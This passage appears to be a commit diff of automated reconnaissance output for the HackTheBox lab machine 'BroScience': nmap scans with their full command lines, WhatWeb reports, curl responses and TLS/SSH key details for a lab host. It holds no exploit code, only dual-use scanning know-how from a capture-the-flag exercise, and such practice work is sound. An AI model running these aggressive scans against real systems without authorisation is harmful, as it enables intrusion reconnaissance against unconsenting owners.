71:46:79:c9:c8:b3:3d:cf:ba:7a:b7:a8:16:0c:d9:
9a:3e:6a:23:49:41:5b:86:59:36:7e:66:e6:70:5c:
02:55:71:08:2e:aa:cd:3f:af:51:8d:4d:8f:c5:72:
0b:4b:1e:87:dd:00:25:81:97:1f:29:56:38:9a:04:
97:e6:bc:50:ea:db:8a:b6:e4:ba:f2:4d:87:01:ba:
12:bc:a8:d9:e9:d6:82:64:a4:c8:71:c8:8c:7d:9d:
99:2d:bd:be:6c:9d:c4:02:5a:7d:34:74:e0:84:24:
6e:6c:9f:85:bb:98:30:49:79:69:96:50:09:2f:99:
b8:0f:b9:31:10:96:6e:96:60:f0:4d:36:3b:9c:c0:
59:26:ba:29:cd:d6:d4:39:e3:10:52:4d:10:26:3d:
7f:08:a0:6b:ce:36:b1:1e:d0:c5:06:1a:24:dd:f4:
6c:14:00:1b:40:c9:81:ac:ba:01:ff:bb:70:1f:36:
73:32:2d:f1:a4:5a:81:ca:e4:ac:27:81:b5:67:3a:
b7:45:57:c8:23:80:a9:e5:52:82:1a:b3:62:16:6e:
01:b1:90:69:02:4d:fe:58:1c:54:bd:99:93:2f:09:
b5:ee:f4:10:65:bd:2e:ca:b5:9b:aa:3d:da:0a:0c:
09:f1:05:2b:12:a2:78:3d:27:89:5b:4e:5b:5b:ff:
9a:4b:b0:30:6e:d1:e9:54:58:f4:3e:b2:4a:7f:63:
4c:ad:16:9a:60:58:5f:45:75:e3:9a:18:05:4f:16:
51:b8:40:a9:90:0f:6f:fb:ec:6b:21:a6:56:c2:9a:
5f:aa:ee:35:43:b4:b7:4e:d9:84:c8:ce:f0:63:b5:
98:18:79:d3:bf:b7:61:1b:58:ce:dc:2e:78:23:8b:
ed:ed:cd:e6:37:4e:59:72:1a:b8:65:d0:69:fa:3d:
8e:1b:a1:95:eb:64:b6:67:85:b3:9c:ad:33:98:13:
7f:45:fb:47:e2:27:93:67:28:ba:6e:53:23:f2:95:
2b:65:90:2d:bf:a8:48:e9:20:a9:ba:d5:a4:8c:ab:
dd:8a:e9:a9:6d:4d:9f:27:a4:3f:07:94:6c:2f:e7:
e3:fb:92:66:fd:7e:f5:01:e3:18:9d:da:42:d5:a6:
7f:bd:c9:14:29:06:04:17:a2:ac:db:9f:6f:8f:e2:
99:d5:fc:19:9a:64:26:cd:f9:91:c2:f7:da:04:72:
7e:92:c7:17:d8:32:10:86:d6:f4:d1:27:5f:59:29:
83:c5:5f:0a:b5:09:3a:34:79:3c:57:9d:8d:5b:70:
e0:6f:db
Exponent: 65537 (0x10001)
X509v3 Extensions:
X509v3 Subject Key Identifier:
7C:BC:C5:22:C8:6E:50:5B:21:11:E5:C3:A1:93:6E:2B:68:BF:80:5A
X509v3 Authority Key Identifier:
keyid:7C:BC:C5:22:C8:6E:50:5B:21:11:E5:C3:A1:93:6E:2B:68:BF:80:5A
X509v3 Basic Constraints: critical
CA:TRUE
Verify Certificate:
self signed certificate
SSL Certificate:
Signature Algorithm: sha256WithRSAEncryption
RSA Key Strength: 4096
Subject: broscience.htb
Issuer: broscience.htb
Not valid before: Jul 14 19:48:36 2022 GMT
Not valid after: Jul 14 19:48:36 2023 GMT

506
HTB/broscience/results/scans/tcp443/xml/tcp_443_https_nmap.xml Normal file
View File

File diff suppressed because one or more lines are too long

113014
HTB/broscience/results/scans/tcp80/tcp_80_http_broscience.htb_vhosts_subdomains-top1million-110000.txt Normal file
View File

File diff suppressed because it is too large Load Diff

16
HTB/broscience/results/scans/tcp80/tcp_80_http_curl-robots.txt Normal file
View File

@@ -0,0 +1,16 @@
HTTP/1.1 301 Moved Permanently
Date: Wed, 01 Feb 2023 16:50:15 GMT
Server: Apache/2.4.54 (Debian)
Location: https://broscience.htb/robots.txt
Content-Length: 319
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://broscience.htb/robots.txt">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 10.10.11.195 Port 80</address>
</body></html>

16
HTB/broscience/results/scans/tcp80/tcp_80_http_curl.html Normal file
View File

@@ -0,0 +1,16 @@
HTTP/1.1 301 Moved Permanently
Date: Wed, 01 Feb 2023 16:50:15 GMT
Server: Apache/2.4.54 (Debian)
Location: https://broscience.htb/
Content-Length: 309
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://broscience.htb/">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 10.10.11.195 Port 80</address>
</body></html>

968138
HTB/broscience/results/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt Normal file
View File

File diff suppressed because it is too large Load Diff

16
HTB/broscience/results/scans/tcp80/tcp_80_http_known-security.txt Normal file
View File

@@ -0,0 +1,16 @@
HTTP/1.1 301 Moved Permanently
Date: Wed, 01 Feb 2023 16:50:15 GMT
Server: Apache/2.4.54 (Debian)
Location: https://broscience.htb/.well-known/security.txt
Content-Length: 333
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://broscience.htb/.well-known/security.txt">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 10.10.11.195 Port 80</address>
</body></html>

82
HTB/broscience/results/scans/tcp80/tcp_80_http_nmap.txt Normal file
View File

@@ -0,0 +1,82 @@
# Nmap 7.93 scan initiated Wed Feb 1 17:50:14 2023 as: nmap -vv --reason -Pn -T4 -sV -p 80 "--script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN /home/kali/htb/broscience/results/scans/tcp80/tcp_80_http_nmap.txt -oX /home/kali/htb/broscience/results/scans/tcp80/xml/tcp_80_http_nmap.xml 10.10.11.195
Nmap scan report for broscience.htb (10.10.11.195)
Host is up, received user-set (0.032s latency).
Scanned at 2023-02-01 17:50:14 CET for 41s
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.54
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-passwd: ERROR: Script execution failed (use -d to debug)
|_http-vuln-cve2013-7091: ERROR: Script execution failed (use -d to debug)
|_http-malware-host: Host appears to be clean
|_http-server-header: Apache/2.4.54 (Debian)
|_http-fetch: Please enter the complete path of the directory to save data in.
|_http-referer-checker: Couldn't find any cross-domain scripts.
|_http-feed: Couldn't find any feeds.
|_http-title: Did not follow redirect to https://broscience.htb/
| http-useragent-tester:
| Status for browser useragent: 200
| Redirected To: https://broscience.htb/
| Allowed User Agents:
| Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
| libwww
| lwp-trivial
| libcurl-agent/1.0
| PHP/
| Python-urllib/2.5
| GT::WWW
| Snoopy
| MFC_Tear_Sample
| HTTP::Lite
| PHPCrawl
| URI::Fetch
| Zend_Http_Client
| http client
| PECL::HTTP
| Wget/1.13.4 (linux-gnu)
|_ WWW-Mechanize/1.34
|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
|_http-mobileversion-checker: No mobile version detected.
|_http-wordpress-enum: Nothing found amongst the top 100 resources,use --script-args search-limit=<number|all> for deeper analysis)
| http-vhosts:
|_128 names had status 301
|_http-comments-displayer: Couldn't find any comments.
|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-sitemap-generator:
| Directory structure:
| Longest directory structure:
| Depth: 0
| Dir: /
| Total files found (by extension):
|_
| http-security-headers:
| Cache_Control:
| Header: Cache-Control: no-store, no-cache, must-revalidate
| Pragma:
| Header: Pragma: no-cache
| Expires:
|_ Header: Expires: Thu, 19 Nov 1981 08:52:00 GMT
|_http-chrono: Request times for /; avg: 307.69ms; min: 157.39ms; max: 507.13ms
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
| http-headers:
| Date: Wed, 01 Feb 2023 16:50:40 GMT
| Server: Apache/2.4.54 (Debian)
| Location: https://broscience.htb/
| Content-Length: 311
| Connection: close
| Content-Type: text/html; charset=iso-8859-1
|
|_ (Request type: GET)
|_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number=<number|all> for deeper analysis)
|_http-errors: Couldn't find any error pages.
|_http-date: Wed, 01 Feb 2023 16:50:32 GMT; 0s from local time.
|_http-config-backup: ERROR: Script execution failed (use -d to debug)
|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Feb 1 17:50:55 2023 -- 1 IP address (1 host up) scanned in 41.47 seconds

BIN
HTB/broscience/results/scans/tcp80/tcp_80_http_screenshot.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 17 MiB

97
HTB/broscience/results/scans/tcp80/tcp_80_http_whatweb.txt Normal file
View File

@@ -0,0 +1,97 @@
WhatWeb report for http://10.10.11.195:80
Status : 301 Moved Permanently
Title : 301 Moved Permanently
IP : 10.10.11.195
Country : RESERVED, ZZ
Summary : Apache[2.4.54], HTTPServer[Debian Linux][Apache/2.4.54 (Debian)], RedirectLocation[https://broscience.htb/]
Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.
Version : 2.4.54 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
OS : Debian Linux
String : Apache/2.4.54 (Debian) (from server string)
[ RedirectLocation ]
HTTP Server string location. used with http-status 301 and
302
String : https://broscience.htb/ (from location)
HTTP Headers:
HTTP/1.1 301 Moved Permanently
Date: Wed, 01 Feb 2023 16:50:21 GMT
Server: Apache/2.4.54 (Debian)
Location: https://broscience.htb/
Content-Length: 309
Connection: close
Content-Type: text/html; charset=iso-8859-1
WhatWeb report for https://broscience.htb/
Status : 200 OK
Title : BroScience : Home
IP : 10.10.11.195
Country : RESERVED, ZZ
Summary : Apache[2.4.54], Cookies[PHPSESSID], HTTPServer[Debian Linux][Apache/2.4.54 (Debian)], Script
Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.
Version : 2.4.54 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/
[ Cookies ]
Display the names of cookies in the HTTP headers. The
values are not returned to save on space.
String : PHPSESSID
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
OS : Debian Linux
String : Apache/2.4.54 (Debian) (from server string)
[ Script ]
This plugin detects instances of script HTML elements and
returns the script language/type.
HTTP Headers:
HTTP/1.1 200 OK
Date: Wed, 01 Feb 2023 16:50:39 GMT
Server: Apache/2.4.54 (Debian)
Set-Cookie: PHPSESSID=mqqap7okl1bs60oanfo17fb97c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1418
Connection: close
Content-Type: text/html; charset=UTF-8

84
HTB/broscience/results/scans/tcp80/xml/tcp_80_http_nmap.xml Normal file
View File

@@ -0,0 +1,84 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.93 scan initiated Wed Feb 1 17:50:14 2023 as: nmap -vv -&#45;reason -Pn -T4 -sV -p 80 &quot;-&#45;script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)&quot; -oN /home/kali/htb/broscience/results/scans/tcp80/tcp_80_http_nmap.txt -oX /home/kali/htb/broscience/results/scans/tcp80/xml/tcp_80_http_nmap.xml 10.10.11.195 -->
<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sV -p 80 &quot;-&#45;script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)&quot; -oN /home/kali/htb/broscience/results/scans/tcp80/tcp_80_http_nmap.txt -oX /home/kali/htb/broscience/results/scans/tcp80/xml/tcp_80_http_nmap.xml 10.10.11.195" start="1675270214" startstr="Wed Feb 1 17:50:14 2023" version="7.93" xmloutputversion="1.05">
<scaninfo type="syn" protocol="tcp" numservices="1" services="80"/>
<verbose level="2"/>
<debugging level="0"/>
<taskbegin task="NSE" time="1675270214"/>
<taskend task="NSE" time="1675270214"/>
<taskbegin task="NSE" time="1675270214"/>
<taskend task="NSE" time="1675270214"/>
<taskbegin task="NSE" time="1675270214"/>
<taskend task="NSE" time="1675270214"/>
<taskbegin task="SYN Stealth Scan" time="1675270214"/>
<taskend task="SYN Stealth Scan" time="1675270214" extrainfo="1 total ports"/>
<taskbegin task="Service scan" time="1675270214"/>
<taskend task="Service scan" time="1675270221" extrainfo="1 service on 1 host"/>
<taskbegin task="NSE" time="1675270221"/>
<taskprogress task="NSE" time="1675270252" percent="99.67" remaining="1" etc="1675270252"/>
<taskend task="NSE" time="1675270255"/>
<taskbegin task="NSE" time="1675270255"/>
<taskend task="NSE" time="1675270255"/>
<taskbegin task="NSE" time="1675270255"/>
<taskend task="NSE" time="1675270255"/>
<host starttime="1675270214" endtime="1675270255"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="10.10.11.195" addrtype="ipv4"/>
<hostnames>
<hostname name="broscience.htb" type="PTR"/>
</hostnames>
<ports><port protocol="tcp" portid="80"><state state="open" reason="syn-ack" reason_ttl="63"/><service name="http" product="Apache httpd" version="2.4.54" hostname="broscience.htb" method="probed" conf="10"><cpe>cpe:/a:apache:http_server:2.4.54</cpe></service><script id="http-dombased-xss" output="Couldn&apos;t find any DOM based XSS."/><script id="http-passwd" output="ERROR: Script execution failed (use -d to debug)"/><script id="http-vuln-cve2013-7091" output="ERROR: Script execution failed (use -d to debug)"/><script id="http-malware-host" output="Host appears to be clean"/><script id="http-server-header" output="Apache/2.4.54 (Debian)"><elem>Apache/2.4.54 (Debian)</elem>
</script><script id="http-fetch" output="Please enter the complete path of the directory to save data in."><elem key="ERROR">Please enter the complete path of the directory to save data in.</elem>
</script><script id="http-referer-checker" output="Couldn&apos;t find any cross-domain scripts."/><script id="http-feed" output="Couldn&apos;t find any feeds."/><script id="http-title" output="Did not follow redirect to https://broscience.htb/"><elem key="redirect_url">https://broscience.htb/</elem>
</script><script id="http-useragent-tester" output="&#xa; Status for browser useragent: 200&#xa; Redirected To: https://broscience.htb/&#xa; Allowed User Agents: &#xa; Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)&#xa; libwww&#xa; lwp-trivial&#xa; libcurl-agent/1.0&#xa; PHP/&#xa; Python-urllib/2.5&#xa; GT::WWW&#xa; Snoopy&#xa; MFC_Tear_Sample&#xa; HTTP::Lite&#xa; PHPCrawl&#xa; URI::Fetch&#xa; Zend_Http_Client&#xa; http client&#xa; PECL::HTTP&#xa; Wget/1.13.4 (linux-gnu)&#xa; WWW-Mechanize/1.34"><elem key="Status for browser useragent">200</elem>
<elem key="Redirected To">https://broscience.htb/</elem>
<table key="Allowed User Agents">
<elem>Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)</elem>
<elem>libwww</elem>
<elem>lwp-trivial</elem>
<elem>libcurl-agent/1.0</elem>
<elem>PHP/</elem>
<elem>Python-urllib/2.5</elem>
<elem>GT::WWW</elem>
<elem>Snoopy</elem>
<elem>MFC_Tear_Sample</elem>
<elem>HTTP::Lite</elem>
<elem>PHPCrawl</elem>
<elem>URI::Fetch</elem>
<elem>Zend_Http_Client</elem>
<elem>http client</elem>
<elem>PECL::HTTP</elem>
<elem>Wget/1.13.4 (linux-gnu)</elem>
<elem>WWW-Mechanize/1.34</elem>
</table>
</script><script id="http-litespeed-sourcecode-download" output="Request with null byte did not work. This web server might not be vulnerable"/><script id="http-mobileversion-checker" output="No mobile version detected."/><script id="http-wordpress-enum" output="Nothing found amongst the top 100 resources,use -&#45;script-args search-limit=&lt;number|all&gt; for deeper analysis)"/><script id="http-vhosts" output="&#xa;128 names had status 301"/><script id="http-comments-displayer" output="Couldn&apos;t find any comments."/><script id="http-devframework" output="Couldn&apos;t determine the underlying framework or CMS. Try increasing &apos;httpspider.maxpagecount&apos; value to spider more pages."/><script id="http-csrf" output="Couldn&apos;t find any CSRF vulnerabilities."/><script id="http-methods" output="&#xa; Supported Methods: GET HEAD POST OPTIONS"><table key="Supported Methods">
<elem>GET</elem>
<elem>HEAD</elem>
<elem>POST</elem>
<elem>OPTIONS</elem>
</table>
</script><script id="http-stored-xss" output="Couldn&apos;t find any stored XSS vulnerabilities."/><script id="http-sitemap-generator" output="&#xa; Directory structure:&#xa; Longest directory structure:&#xa; Depth: 0&#xa; Dir: /&#xa; Total files found (by extension):&#xa; &#xa;"/><script id="http-security-headers" output="&#xa; Cache_Control: &#xa; Header: Cache-Control: no-store, no-cache, must-revalidate&#xa; Pragma: &#xa; Header: Pragma: no-cache&#xa; Expires: &#xa; Header: Expires: Thu, 19 Nov 1981 08:52:00 GMT"><table key="Cache_Control">
<elem>Header: Cache-Control: no-store, no-cache, must-revalidate</elem>
</table>
<table key="Pragma">
<elem>Header: Pragma: no-cache</elem>
</table>
<table key="Expires">
<elem>Header: Expires: Thu, 19 Nov 1981 08:52:00 GMT</elem>
</table>
</script><script id="http-chrono" output="Request times for /; avg: 307.69ms; min: 157.39ms; max: 507.13ms"/><script id="http-jsonp-detection" output="Couldn&apos;t find any JSONP endpoints."/><script id="http-headers" output="&#xa; Date: Wed, 01 Feb 2023 16:50:40 GMT&#xa; Server: Apache/2.4.54 (Debian)&#xa; Location: https://broscience.htb/&#xa; Content-Length: 311&#xa; Connection: close&#xa; Content-Type: text/html; charset=iso-8859-1&#xa; &#xa; (Request type: GET)&#xa;"/><script id="http-drupal-enum" output="Nothing found amongst the top 100 resources,use -&#45;script-args number=&lt;number|all&gt; for deeper analysis)"/><script id="http-errors" output="Couldn&apos;t find any error pages."/><script id="http-date" output="Wed, 01 Feb 2023 16:50:32 GMT; 0s from local time."><elem key="date">2023-02-01T16:50:32+00:00</elem>
<elem key="delta">0.0</elem>
</script><script id="http-config-backup" output="ERROR: Script execution failed (use -d to debug)"/><script id="http-wordpress-users" output="[Error] Wordpress installation was not found. We couldn&apos;t find wp-login.php"/></port>
</ports>
<times srtt="31501" rttvar="31501" to="157505"/>
</host>
<taskbegin task="NSE" time="1675270255"/>
<taskend task="NSE" time="1675270255"/>
<taskbegin task="NSE" time="1675270255"/>
<taskend task="NSE" time="1675270255"/>
<taskbegin task="NSE" time="1675270255"/>
<taskend task="NSE" time="1675270255"/>
<runstats><finished time="1675270255" timestr="Wed Feb 1 17:50:55 2023" summary="Nmap done at Wed Feb 1 17:50:55 2023; 1 IP address (1 host up) scanned in 41.47 seconds" elapsed="41.47" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>

174
HTB/broscience/results/scans/xml/_full_tcp_nmap.xml Normal file
View File

@@ -0,0 +1,174 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.93 scan initiated Wed Feb 1 17:49:39 2023 as: nmap -vv -&#45;reason -Pn -T4 -sV -sC -&#45;version-all -A -&#45;osscan-guess -p- -oN /home/kali/htb/broscience/results/scans/_full_tcp_nmap.txt -oX /home/kali/htb/broscience/results/scans/xml/_full_tcp_nmap.xml 10.10.11.195 -->
<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sV -sC -&#45;version-all -A -&#45;osscan-guess -p- -oN /home/kali/htb/broscience/results/scans/_full_tcp_nmap.txt -oX /home/kali/htb/broscience/results/scans/xml/_full_tcp_nmap.xml 10.10.11.195" start="1675270179" startstr="Wed Feb 1 17:49:39 2023" version="7.93" xmloutputversion="1.05">
<scaninfo type="syn" protocol="tcp" numservices="65535" services="1-65535"/>
<verbose level="2"/>
<debugging level="0"/>
<taskbegin task="NSE" time="1675270179"/>
<taskend task="NSE" time="1675270179"/>
<taskbegin task="NSE" time="1675270179"/>
<taskend task="NSE" time="1675270179"/>
<taskbegin task="NSE" time="1675270179"/>
<taskend task="NSE" time="1675270179"/>
<taskbegin task="SYN Stealth Scan" time="1675270179"/>
<taskend task="SYN Stealth Scan" time="1675270188" extrainfo="65535 total ports"/>
<taskbegin task="Service scan" time="1675270188"/>
<taskend task="Service scan" time="1675270201" extrainfo="3 services on 1 host"/>
<taskbegin task="Traceroute" time="1675270204"/>
<taskend task="Traceroute" time="1675270205"/>
<taskbegin task="Parallel DNS resolution of 1 host." time="1675270205"/>
<taskend task="Parallel DNS resolution of 1 host." time="1675270216"/>
<taskbegin task="NSE" time="1675270216"/>
<taskend task="NSE" time="1675270239"/>
<taskbegin task="NSE" time="1675270239"/>
<taskend task="NSE" time="1675270241"/>
<taskbegin task="NSE" time="1675270241"/>
<taskend task="NSE" time="1675270241"/>
<host starttime="1675270179" endtime="1675270241"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="10.10.11.195" addrtype="ipv4"/>
<hostnames>
<hostname name="broscience.htb" type="PTR"/>
</hostnames>
<ports><extraports state="closed" count="65532">
<extrareasons reason="reset" count="65532" proto="tcp" ports="1-21,23-79,81-442,444-65535"/>
</extraports>
<port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="63"/><service name="ssh" product="OpenSSH" version="8.4p1 Debian 5+deb11u1" extrainfo="protocol 2.0" ostype="Linux" method="probed" conf="10"><cpe>cpe:/a:openbsd:openssh:8.4p1</cpe><cpe>cpe:/o:linux:linux_kernel</cpe></service><script id="ssh-hostkey" output="&#xa; 3072 df17c6bab18222d91db5ebff5d3d2cb7 (RSA)&#xa;ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDB5dEat1MGh3CDDnkl4tdWQcTpdWZYHZj5/Orv3PDjSiQ4dg1i35kknwiZrXLiMsUu/4TigP9Kc3h4M1CS7E3/GprpWxuGmipEucoQuNEtaM0sUa8xobtFxOVF46kS0++ozTd4+zbSLsu73SlLcSuSFalhGnHteHj6/ksSeX642103SMqkkmEu/cbgofkoqQOCYk3Qa42bZq5bjS/auGAlPoAxTjjVtpHnXOKOU7M6gkewD91FB3GAMUdwqR/PJcA5xqGFZm2St9ecSbewCur6pLN5YKnNhvdID4ijWI22gu5pLxHL9XjORMbSUkJbB79VoYJZaNkdOgt+HXR67s9DWI47D6/+pO0dTfQgMFgOCxYheWMDQ2FuyHyGX1CZpMVLAo3sjOvxAqk7eUGutsyBAlYCD4lhSFs6RhSBynahHQah7+Lv5LKRriZe/fQIgrJrQj+tR4Uhz89eWGrXK9bjN22wy7tVkMG/w5dOwo7S3Wi0aTZfd/17D0z7wSdiAiE=&#xa; 256 3f8a56f8958faeafe3ae7eb880f679d2 (ECDSA)&#xa;ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCgM9UKdxFmXRJESXdlb+BSl+K1F0YCkOjSa8l+tgD6Y3mslSfrawZkdfq8NKLZlmOe8uf1ykgXjLWVDQ9NrJBk=&#xa; 256 3c6575274ae2ef9391374cfdd9d46341 (ED25519)&#xa;ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOMwR+IfRojCwiMuM3tZvdD5JCD2MRVum9frUha60bkN"><table>
<elem key="fingerprint">df17c6bab18222d91db5ebff5d3d2cb7</elem>
<elem key="type">ssh-rsa</elem>
<elem key="key">AAAAB3NzaC1yc2EAAAADAQABAAABgQDB5dEat1MGh3CDDnkl4tdWQcTpdWZYHZj5/Orv3PDjSiQ4dg1i35kknwiZrXLiMsUu/4TigP9Kc3h4M1CS7E3/GprpWxuGmipEucoQuNEtaM0sUa8xobtFxOVF46kS0++ozTd4+zbSLsu73SlLcSuSFalhGnHteHj6/ksSeX642103SMqkkmEu/cbgofkoqQOCYk3Qa42bZq5bjS/auGAlPoAxTjjVtpHnXOKOU7M6gkewD91FB3GAMUdwqR/PJcA5xqGFZm2St9ecSbewCur6pLN5YKnNhvdID4ijWI22gu5pLxHL9XjORMbSUkJbB79VoYJZaNkdOgt+HXR67s9DWI47D6/+pO0dTfQgMFgOCxYheWMDQ2FuyHyGX1CZpMVLAo3sjOvxAqk7eUGutsyBAlYCD4lhSFs6RhSBynahHQah7+Lv5LKRriZe/fQIgrJrQj+tR4Uhz89eWGrXK9bjN22wy7tVkMG/w5dOwo7S3Wi0aTZfd/17D0z7wSdiAiE=</elem>
<elem key="bits">3072</elem>
</table>
<table>
<elem key="fingerprint">3f8a56f8958faeafe3ae7eb880f679d2</elem>
<elem key="type">ecdsa-sha2-nistp256</elem>
<elem key="key">AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCgM9UKdxFmXRJESXdlb+BSl+K1F0YCkOjSa8l+tgD6Y3mslSfrawZkdfq8NKLZlmOe8uf1ykgXjLWVDQ9NrJBk=</elem>
<elem key="bits">256</elem>
</table>
<table>
<elem key="fingerprint">3c6575274ae2ef9391374cfdd9d46341</elem>
<elem key="type">ssh-ed25519</elem>
<elem key="key">AAAAC3NzaC1lZDI1NTE5AAAAIOMwR+IfRojCwiMuM3tZvdD5JCD2MRVum9frUha60bkN</elem>
<elem key="bits">256</elem>
</table>
</script></port>
<port protocol="tcp" portid="80"><state state="open" reason="syn-ack" reason_ttl="63"/><service name="http" product="Apache httpd" version="2.4.54" hostname="broscience.htb" method="probed" conf="10"><cpe>cpe:/a:apache:http_server:2.4.54</cpe></service><script id="http-title" output="Did not follow redirect to https://broscience.htb/"><elem key="redirect_url">https://broscience.htb/</elem>
</script><script id="http-methods" output="&#xa; Supported Methods: GET HEAD POST OPTIONS"><table key="Supported Methods">
<elem>GET</elem>
<elem>HEAD</elem>
<elem>POST</elem>
<elem>OPTIONS</elem>
</table>
</script><script id="http-server-header" output="Apache/2.4.54 (Debian)"><elem>Apache/2.4.54 (Debian)</elem>
</script></port>
<port protocol="tcp" portid="443"><state state="open" reason="syn-ack" reason_ttl="63"/><service name="http" product="Apache httpd" version="2.4.54" extrainfo="(Debian)" tunnel="ssl" method="probed" conf="10"><cpe>cpe:/a:apache:http_server:2.4.54</cpe></service><script id="http-methods" output="&#xa; Supported Methods: GET HEAD POST OPTIONS"><table key="Supported Methods">
<elem>GET</elem>
<elem>HEAD</elem>
<elem>POST</elem>
<elem>OPTIONS</elem>
</table>
</script><script id="http-title" output="400 Bad Request"><elem key="title">400 Bad Request</elem>
</script><script id="ssl-cert" output="Subject: commonName=broscience.htb/organizationName=BroScience/countryName=AT/emailAddress=administrator@broscience.htb/localityName=Vienna&#xa;Issuer: commonName=broscience.htb/organizationName=BroScience/countryName=AT/emailAddress=administrator@broscience.htb/localityName=Vienna&#xa;Public Key type: rsa&#xa;Public Key bits: 4096&#xa;Signature Algorithm: sha256WithRSAEncryption&#xa;Not valid before: 2022-07-14T19:48:36&#xa;Not valid after: 2023-07-14T19:48:36&#xa;MD5: 5328ddd62f3429d11d26ae8a68d86e0c&#xa;SHA-1: 20568d0d9e4109cde5a22021fe3f349c40d8d75b&#xa;-&#45;&#45;&#45;&#45;BEGIN CERTIFICATE-&#45;&#45;&#45;&#45;&#xa;MIIF0zCCA7ugAwIBAgIUD+qpK08oB9Kng1mp3mIxnO21+s4wDQYJKoZIhvcNAQEL&#xa;BQAweTELMAkGA1UEBhMCQVQxDzANBgNVBAcMBlZpZW5uYTETMBEGA1UECgwKQnJv&#xa;U2NpZW5jZTEXMBUGA1UEAwwOYnJvc2NpZW5jZS5odGIxKzApBgkqhkiG9w0BCQEW&#xa;HGFkbWluaXN0cmF0b3JAYnJvc2NpZW5jZS5odGIwHhcNMjIwNzE0MTk0ODM2WhcN&#xa;MjMwNzE0MTk0ODM2WjB5MQswCQYDVQQGEwJBVDEPMA0GA1UEBwwGVmllbm5hMRMw&#xa;EQYDVQQKDApCcm9TY2llbmNlMRcwFQYDVQQDDA5icm9zY2llbmNlLmh0YjErMCkG&#xa;CSqGSIb3DQEJARYcYWRtaW5pc3RyYXRvckBicm9zY2llbmNlLmh0YjCCAiIwDQYJ&#xa;KoZIhvcNAQEBBQADggIPADCCAgoCggIBAKcyX2E/e8BqyRU6FoKOWoWFJo6nLHhK&#xa;B0wNgmPrcUZ5ycizPc+6ereoFgzZmj5qI0lBW4ZZNn5m5nBcAlVxCC6qzT+vUY1N&#xa;j8VyC0seh90AJYGXHylWOJoEl+a8UOrbirbkuvJNhwG6Eryo2enWgmSkyHHIjH2d&#xa;mS29vmydxAJafTR04IQkbmyfhbuYMEl5aZZQCS+ZuA+5MRCWbpZg8E02O5zAWSa6&#xa;Kc3W1DnjEFJNECY9fwiga842sR7QxQYaJN30bBQAG0DJgay6Af+